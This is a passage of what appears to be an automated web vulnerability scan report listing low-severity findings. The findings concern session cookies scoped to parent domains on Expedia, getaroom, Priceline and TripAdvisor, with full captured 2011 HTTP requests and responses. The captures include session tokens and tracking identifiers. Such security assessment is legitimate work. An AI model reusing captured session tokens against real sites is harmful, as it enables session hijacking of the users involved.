jQuery(document).ready(function($){
var $hotelSearchForm = $("#hotelSearchForm");
var $form = $("#hotelFilterForm");

$hotelSearchForm.bind("submit", function(e){
$hotelSe
...[SNIP]...

13.13. http://www.expedia.com/Hotels/Offers

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.expedia.com
Path:   /Hotels/Offers

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Hotels/Offers?action=getAndUpdateHotelProductActivity&hotelIds=894999&durationForViews=1800000&durationForBookings=172800000 HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Boston-Hotels-Hotel-Commonwealth.h894999.Hotel-Information?icmcid=TRIPA.Expedia_US-H_B4.11893.T&icmdtl=MT1110027Z3xeMPeET6itK0Qu1f-JQAAU.894999.HDSSDeE.T.QCI.258705.ch.668.60745.en_US..&chkin=10/14/11&hashTag=roomsAndRates&chkout=10/16/11&eapid=21187-1&rm1=a2&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; U9Z5=0; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; bn_u=7520316067152911274; COOKIECHECK=1; lsrc=v.1,10/16/2011; MediaCookie=0`1034,1004,PDEST,BOS; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; iEAPID=21187; JSESSION=1cf0d0d6-5e6f-4aff-9a37-f908a92430be; s1=`EAPName=TripAdvisor`EAPBrandingFeature=0`EAPIsVisible=0`EAPIndustry=Other`MH=21187`EAPBrandingURL=`99; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63; aspp=v.1,0|TRIPA.Expedia_US-H_B4.11893.T|||||||||ICM|20111101|; aspp=v.1,0|TRIPA.Expedia_US-H_B4.11893.T|||||||||ICM|20111101|

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Vary: Accept-Encoding
Content-Type: application/json;charset=UTF-8
Content-Length: 164
Date: Mon, 03 Oct 2011 01:02:38 GMT
Connection: close
Set-Cookie: ipsnf3_ext=; Domain=.expedia.com; Expires=Sun, 03-Oct-2010 01:02:38 GMT; Path=/
Set-Cookie: JSESSION=1cf0d0d6-5e6f-4aff-9a37-f908a92430be; Domain=.expedia.com; Path=/
Set-Cookie: s1=`EAPName=TripAdvisor`EAPBrandingFeature=0`EAPIsVisible=0`user=v.8,0,EX01B27DF898$F1$88002000$D6$5C37n$BE$C6$0En$BE$C6$0En$BE$C6$0E1000$11000$1E81!90$BB$B4$8E$8Ah$14l$AD!i02000`EAPIndustry=Other`MH=21187`EAPBrandingURL=`218; Domain=.expedia.com; Path=/
Set-Cookie: p1=`minfo=v.5,EX01B7A7E781$9B$B1KB$EF$A4$FBJ$F2$A0$FC$25$96$FF$9A$90l$9Ds$C4$E1$82$EF$E3$EB$AC$37E$8DW$8B$9C$BDM$29q$E3$9A$13$CDO$15$A4$F7$5C$FE$EBEn$0E$83.$B6$FD$ED$9E$A4$E4$C16$86k$EF`accttype=v.2,8,1,EX012A48FECC$9B$B1KB$F2$A4$FBL$F2$BC$FC$2B$95$FF$9B$90z$9Ds$C2$E1$82$EB!2$E3$AC$37I$8DW$85$AA$BDM`tpid=v.1,1`linfo=v.4,Guest|0|0|255|1|0||Guest|User|Guest|User|Guest S User|247905900|1033|0|0||0|0|0|-1|-1`404; Domain=.expedia.com; Expires=Sun, 02-Oct-2016 06:06:28 GMT; Path=/

{"ViewStatus":0,"BookingStatus":0,"HotelProductActivityList":[{"ViewCount":5,"BookingCount":3,"HotelId":894999,"isValidViewCount":true,"isValidBookingCount":true}]}

13.14. http://www.expedia.com/Hotels/Offers

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.expedia.com
Path:   /Hotels/Offers

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Hotels/Offers?action=getAndUpdateHotelProductActivity&hotelIds=4215&durationForViews=1800000&durationForBookings=172800000 HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Boston-Hotels-The-Boston-Park-Plaza-Hotel-Towers.h4215.Hotel-Information?chkin=10%2F04%2F2011&chkout=10%2F07%2F2011&rm1=a1&hwrqCacheKey=ccf4a420-af8b-480f-8413-efb42e880287HWRQ&hashTag=roomsAndRates&rfrr=-5517&c=d20f4232-e339-420a-bcb4-97cad88f9b0f&&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,; lsrc=v.1,10/16/2011; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; U9Z5=0; MediaCookie=0`1034,1004,PDEST,BOS; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSION=aa0f7acd-9a8d-4dba-a7c4-36d8d1ea2a11; s1=`0; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Vary: Accept-Encoding
Content-Type: application/json;charset=UTF-8
Content-Length: 164
Date: Mon, 03 Oct 2011 00:14:15 GMT
Connection: close
Set-Cookie: iEAPID=0000,; Domain=.expedia.com; Path=/
Set-Cookie: ipsnf3_ext=; Domain=.expedia.com; Expires=Sun, 03-Oct-2010 00:14:13 GMT; Path=/
Set-Cookie: JSESSION=aa0f7acd-9a8d-4dba-a7c4-36d8d1ea2a11; Domain=.expedia.com; Path=/
Set-Cookie: s1=`0; Domain=.expedia.com; Path=/
Set-Cookie: p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63; Domain=.expedia.com; Expires=Sun, 02-Oct-2016 05:18:03 GMT; Path=/

{"ViewStatus":0,"BookingStatus":0,"HotelProductActivityList":[{"ViewCount":24,"BookingCount":59,"HotelId":4215,"isValidViewCount":true,"isValidBookingCount":true}]}

13.15. http://www.getaroom.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.getaroom.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.getaroom.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.trip.com/hotels.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: affiliate=032ea00e; show_pu=pageview=0&allowed=true&shown=false; www_session=BAh7CToLc2VhcmNoaQM79eU6D3Nlc3Npb25faWQiJTRmMGJjNjU4OGRkNTY4ZGQwMjcyYjU3Njg0OGRlNmYxIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewY6C25vdGljZSImUGxlYXNlIGVudGVyIGEgdmFsaWQgZGVzdGluYXRpb24uBjoKQHVzZWR7BjsIRjoTcmVtb3RlX2FkZHJlc3MiEjUwLjIzLjEyMy4xMDY%3D--bc19aecb2a0c7d888b60a967615bd73985c6d315

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.8
ETag: "f57a77ed77550a00b9eb6450a79c54dc"
P3P: CP="CAO DSP DEVa TAIa OUR BUS UNI NAV STA PRE LOC", policyref="/w3c/p3p.xml"
X-Runtime: 299
Set-Cookie: show_pu=pageview=0&allowed=true&shown=false; path=/
Set-Cookie: www_session=BAh7CzoLc2VhcmNoaQM79eU6EWdlb19sb2NhdGlvbnsIOhFjb3VudHJ5X2NvZGUiB1VTOhJjdXJyZW5jeV9jb2RlIghVU0Q6EWNvdW50cnlfbmFtZSISVW5pdGVkIFN0YXRlczoPc2Vzc2lvbl9pZCIlNGYwYmM2NTg4ZGQ1NjhkZDAyNzJiNTc2ODQ4ZGU2ZjE6EF9jc3JmX3Rva2VuIjFUeFhFMHM5NXkzS2tHYTFGQmdhSGJxczRKT05qaU55SFFQOHJDWmJ6SVZBPSIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsGOgtub3RpY2UiJlBsZWFzZSBlbnRlciBhIHZhbGlkIGRlc3RpbmF0aW9uLgY6CkB1c2VkewY7DVQ6E3JlbW90ZV9hZGRyZXNzIhI1MC4yMy4xMjMuMTA2--b58708075c48fab0524aa6038b8528509d08eae7; domain=.getaroom.com; path=/; HttpOnly
Cache-Control: private, max-age=0, must-revalidate
Server: nginx/0.8.55 + Phusion Passenger 3.0.8 (mod_rails/mod_rack)
Content-Length: 88588

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:addthis="http://www.addthis.c
...[SNIP]...

13.16. http://www.getaroom.com/browse/market_deals

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.getaroom.com
Path:   /browse/market_deals

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /browse/market_deals?market_id=10 HTTP/1.1
Host: www.getaroom.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.getaroom.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: affiliate=032ea00e; www_session=BAh7CzoLc2VhcmNoaQM79eU6EWdlb19sb2NhdGlvbnsIOhFjb3VudHJ5X2NvZGUiB1VTOhJjdXJyZW5jeV9jb2RlIghVU0Q6EWNvdW50cnlfbmFtZSISVW5pdGVkIFN0YXRlczoPc2Vzc2lvbl9pZCIlNGYwYmM2NTg4ZGQ1NjhkZDAyNzJiNTc2ODQ4ZGU2ZjE6EF9jc3JmX3Rva2VuIjFUeFhFMHM5NXkzS2tHYTFGQmdhSGJxczRKT05qaU55SFFQOHJDWmJ6SVZBPSIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsGOgtub3RpY2UiJlBsZWFzZSBlbnRlciBhIHZhbGlkIGRlc3RpbmF0aW9uLgY6CkB1c2VkewY7DVQ6E3JlbW90ZV9hZGRyZXNzIhI1MC4yMy4xMjMuMTA2--b58708075c48fab0524aa6038b8528509d08eae7; show_pu=pageview=1&allowed=true&shown=false; __utma=155214180.1038388400.1317602249.1317602249.1317602249.1; __utmb=155214180.2.9.1317603739739; __utmc=155214180; __utmz=155214180.1317602249.1.1.utmcsr=trip.com|utmccn=(referral)|utmcmd=referral|utmcct=/hotels.html

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Connection: keep-alive
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.8
ETag: "c52e212f54eec4829ea5658dd625fe7e"
P3P: CP="CAO DSP DEVa TAIa OUR BUS UNI NAV STA PRE LOC", policyref="/w3c/p3p.xml"
X-Runtime: 489
Set-Cookie: show_pu=pageview=1&allowed=true&shown=false; path=/
Set-Cookie: www_session=BAh7CzoLc2VhcmNoaQM79eU6EWdlb19sb2NhdGlvbnsIOhFjb3VudHJ5X2NvZGUiB1VTOhJjdXJyZW5jeV9jb2RlIghVU0Q6EWNvdW50cnlfbmFtZSISVW5pdGVkIFN0YXRlczoPc2Vzc2lvbl9pZCIlNGYwYmM2NTg4ZGQ1NjhkZDAyNzJiNTc2ODQ4ZGU2ZjE6EF9jc3JmX3Rva2VuIjFUeFhFMHM5NXkzS2tHYTFGQmdhSGJxczRKT05qaU55SFFQOHJDWmJ6SVZBPSIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoTcmVtb3RlX2FkZHJlc3MiEjUwLjIzLjEyMy4xMDY%3D--4a29eac522682a877f487f79d32005f0cda149f5; domain=.getaroom.com; path=/; HttpOnly
Cache-Control: private, max-age=0, must-revalidate
Server: nginx/0.8.55 + Phusion Passenger 3.0.8 (mod_rails/mod_rack)
Content-Length: 8536

this.heading_update[this.deals_cache_index] = '<div id=\"deals_heading\"><h2>Hotel Deals of the Day &#183; <span id=\"updated_deals_heading\">Washington DC<\/span><\/h2><\/div>';

this.deals_cache[thi
...[SNIP]...

13.17. http://www.getaroom.com/searches/show

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.getaroom.com
Path:   /searches/show

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /searches/show?destination=+&check_in=10/09/2011&check_out=10/16/2011&num_guests=1&num_rooms=1&affiliate=032ea00e HTTP/1.1
Host: www.getaroom.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.trip.com/hotels.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Status: 302
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.8
P3P: CP="CAO DSP DEVa TAIa OUR BUS UNI NAV STA PRE LOC", policyref="/w3c/p3p.xml"
Location: http://www.getaroom.com/searches/show?check_in=10%2F09%2F2011&check_out=10%2F16%2F2011&destination=+&num_guests=1&num_rooms=1&utm_campaign=Affiliate&utm_medium=cpa&utm_source=away.com
X-Runtime: 7
Content-Length: 277
Set-Cookie: affiliate=032ea00e; path=/
Set-Cookie: www_session=BAh7CzoLc2VhcmNoaQM79eU6EWdlb19sb2NhdGlvbnsIOhFjb3VudHJ5X2NvZGUiB1VTOhJjdXJyZW5jeV9jb2RlIghVU0Q6EWNvdW50cnlfbmFtZSISVW5pdGVkIFN0YXRlczoQX2NzcmZfdG9rZW4iMVR4WEUwczk1eTNLa0dhMUZCZ2FIYnFzNEpPTmppTnlIUVA4ckNaYnpJVkE9Og9zZXNzaW9uX2lkIiU0ZjBiYzY1ODhkZDU2OGRkMDI3MmI1NzY4NDhkZTZmMSIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsGOgtub3RpY2UiJlBsZWFzZSBlbnRlciBhIHZhbGlkIGRlc3RpbmF0aW9uLgY6CkB1c2VkewY7DVQ6E3JlbW90ZV9hZGRyZXNzIhI1MC4yMy4xMjMuMTA2--497837da868085a13e75b3c8521055c245269263; domain=.getaroom.com; path=/; HttpOnly
Cache-Control: no-cache
Server: nginx/0.8.55 + Phusion Passenger 3.0.8 (mod_rails/mod_rack)

<html><body>You are being <a href="http://www.getaroom.com/searches/show?check_in=10%2F09%2F2011&amp;check_out=10%2F16%2F2011&amp;destination=+&amp;num_guests=1&amp;num_rooms=1&amp;utm_campaign=Affili
...[SNIP]...

13.18. http://www.getaroom.com/washington-dc

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.getaroom.com
Path:   /washington-dc

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /washington-dc?amenities%5B%5D=&check_in=10%2F09%2F2011&check_out=10%2F16%2F2011&commit=Go&lucky=true&page=1&property_name=&rinfo=%5B%5B18%5D%5D&search%5Bdestination%5D=m10&sort_order=position HTTP/1.1
Host: www.getaroom.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.getaroom.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: affiliate=032ea00e; __utma=155214180.1038388400.1317602249.1317602249.1317602249.1; __utmb=155214180.3.8.1317603739739; __utmc=155214180; __utmz=155214180.1317602249.1.1.utmcsr=trip.com|utmccn=(referral)|utmcmd=referral|utmcct=/hotels.html; show_pu=pageview=1&allowed=true&shown=false; www_session=BAh7CzoLc2VhcmNoaQM79eU6EWdlb19sb2NhdGlvbnsIOhFjb3VudHJ5X2NvZGUiB1VTOhJjdXJyZW5jeV9jb2RlIghVU0Q6EWNvdW50cnlfbmFtZSISVW5pdGVkIFN0YXRlczoPc2Vzc2lvbl9pZCIlNGYwYmM2NTg4ZGQ1NjhkZDAyNzJiNTc2ODQ4ZGU2ZjE6EF9jc3JmX3Rva2VuIjFUeFhFMHM5NXkzS2tHYTFGQmdhSGJxczRKT05qaU55SFFQOHJDWmJ6SVZBPSIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsGOgtub3RpY2UiJlBsZWFzZSBlbnRlciBhIHZhbGlkIGRlc3RpbmF0aW9uLgY6CkB1c2VkewY7DVQ6E3JlbW90ZV9hZGRyZXNzIhI1MC4yMy4xMjMuMTA2--b58708075c48fab0524aa6038b8528509d08eae7

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.8
ETag: "d2a96c7313287816400edfcdf271bec7"
P3P: CP="CAO DSP DEVa TAIa OUR BUS UNI NAV STA PRE LOC", policyref="/w3c/p3p.xml"
X-Runtime: 1110
Set-Cookie: show_pu=pageview=0&allowed=true&shown=false; path=/
Set-Cookie: www_session=BAh7CjoLc2VhcmNoaQPmLuY6EWdlb19sb2NhdGlvbnsIOhFjb3VudHJ5X2NvZGUiB1VTOhJjdXJyZW5jeV9jb2RlIghVU0Q6EWNvdW50cnlfbmFtZSISVW5pdGVkIFN0YXRlczoPc2Vzc2lvbl9pZCIlNzQ2ZWU2NzIwNWNhYjFlZjA2OTIzYWNlNWE2NGUxMTQ6EF9jc3JmX3Rva2VuIjFIc3ZVTXFGbm9OeXdJNndseElkTFBVeGNBUVRPb2NIaTlJZERGd1ZxVkhjPToTcmVtb3RlX2FkZHJlc3MiEjUwLjIzLjEyMy4xMDY%3D--5dfe791c81b6c944bb35ded07f19836e6a759bfc; domain=.getaroom.com; path=/; HttpOnly
Cache-Control: private, max-age=0, must-revalidate
Server: nginx/0.8.55 + Phusion Passenger 3.0.8 (mod_rails/mod_rack)
Content-Length: 170579

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:addthis="http://www.addthis.c
...[SNIP]...

13.19. http://www.priceline.com/QP.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.priceline.com
Path:   /QP.asp

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /QP.asp?ProductID=5R&refid=PLIGOUGO&refclickid=HOTELSEARCH&City=Boston,United%20States&Rooms=1&CheckInDate=10/04/11&CheckOutDate=10/07/11 HTTP/1.1
Host: www.priceline.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=priceline&grp=9706&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.priceline.com%2FQP.asp%3FProductID%3D5R%26refid%3DPLIGOUGO%26refclickid%3DHOTELSEARCH%26City%3D%24%7Bcity%7D%2C%24%7Bcountryn%7D%26Rooms%3D%24%7Brooms%7D%26CheckInDate%3D%24%7BdepartureDate%3Ad%3A%22mm%2Fdd%2Fyy%22%7D%26CheckOutDate%3D%24%7BreturnDate%3Ad%3A%22mm%2Fdd%2Fyy%22%7D&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=154&pos=1&aii=d1125990-8f30-4f2a-83dc-0b115fb728a1&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:09:43 GMT
Server: Microsoft-IIS/6.0
Content-Length: 7684
Content-Type: text/html
Set-Cookie: Referral=CLICKID=HOTELSEARCH&SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A9%3A43&ID=IGOUGO; expires=Wed, 02-Nov-2011 00:09:42 GMT; domain=.priceline.com; path=/
Set-Cookie: PSessKey=721510AC6F1410AC2011100300094354c311228538; domain=.priceline.com; path=/
Set-Cookie: Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; expires=Thu, 30-Sep-2021 00:09:42 GMT; domain=.priceline.com; path=/
Cache-control: private


<html>
<head>
<meta HTTP-EQUIV="Cache-Control" CONTENT="no cache">
<meta HTTP-EQUIV="Pragma" CONTENT="no cache">
<meta HTTP-EQUIV="Expires" CONTENT="0">
<meta HTTP-EQUIV="content-type"
...[SNIP]...

13.20. http://www.priceline.com/hotels/lang/en-us/itinerary.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.priceline.com
Path:   /hotels/lang/en-us/itinerary.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /hotels/lang/en-us/itinerary.asp?session_key=721510AC6F1410AC2011100300373191ec11270735&plf=pcln&RefID=PLAWAYNETWORK&RefClickID=TRIP_HOTELSEARCH HTTP/1.1
Host: www.priceline.com
Proxy-Connection: keep-alive
Content-Length: 345
Cache-Control: max-age=0
Origin: http://www.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/qp.asp?productid=5&city=bos&rooms=1&checkindate=10/09/2011&checkoutdate=10/16/2011&refid=PLAWAYNETWORK&refclickid=TRIP_HOTELSEARCH
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; SETI=CCD82172E0702BC07F6EEEC20A4BA00AC57A5F491C628C0467A073D149FA2A3BB6E6E8BBB79E476AEE07A579D4DB94147A61E206E535A32806BAB0F253612BA6DBDA270CF1B13D3FC57A5F491C628C04AC84BA6362ADBF59CACA2EC5D22C91F0A30B769ACEDACD603314752CB71B92D3; vid=v2011100300373188ec0127; vsch=v2011100300373188ec0127%5F13692735; PSessKey=721510AC6F1410AC2011100300373191ec11270735; Referral=CLICKID=TRIP%5FHOTELSEARCH&SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A37%3A31&ID=AWAYNETWORK; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A37; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317602255259:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.3.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

OFFER%2FHOTELS%2F%40SEARCH_CITY=bos&OFFER%2FHOTELS%2F%40ROOM_COUNT=1&OFFER%2FHOTELS%2F%40ZONEID=&checkInDate=10%2F09%2F2011&CkInMonth=10&CkInDay=09&CkInYear=2011&checkOutDate=10%2F16%2F2011&CkOutMonth
...[SNIP]...

Response

HTTP/1.1 302 Object moved
Date: Mon, 03 Oct 2011 00:39:09 GMT
Server: Microsoft-IIS/6.0
Location: http://www.priceline.com/hotels/Lang/en-us/retail/retail_bounce.asp?session_key=711510AC721510AC20111003003909435251213033&plf=pcln&KT=Y&ASID=514
Content-Length: 278
Content-Type: text/html
Set-Cookie: PSessKey=711510AC721510AC20111003003909435251213033; domain=.priceline.com; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://www.priceline.com/hotels/Lang/en-us/retail/retail_bounce.asp?session_key=711510AC721510AC20
...[SNIP]...

13.21. http://www.tripadvisor.com/CheckMore

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.tripadvisor.com
Path:   /CheckMore

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /CheckMore?detail=258705&storedUserData=inMonth%3D10%25202011%26inDay%3D14%26outMonth%3D10%25202011%26outDay%3D16%26adults%3DNaN%26pid%3D4799&vendorsChecked=BookingCom__HotelsCom2__Expedia__VenereHotelsLOWUS&vendorsOpened=BookingCom__HotelsCom2__Expedia&a=QC_Inline&s=SmartDeals&av=true&avLocId=258705 HTTP/1.1
Host: www.tripadvisor.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
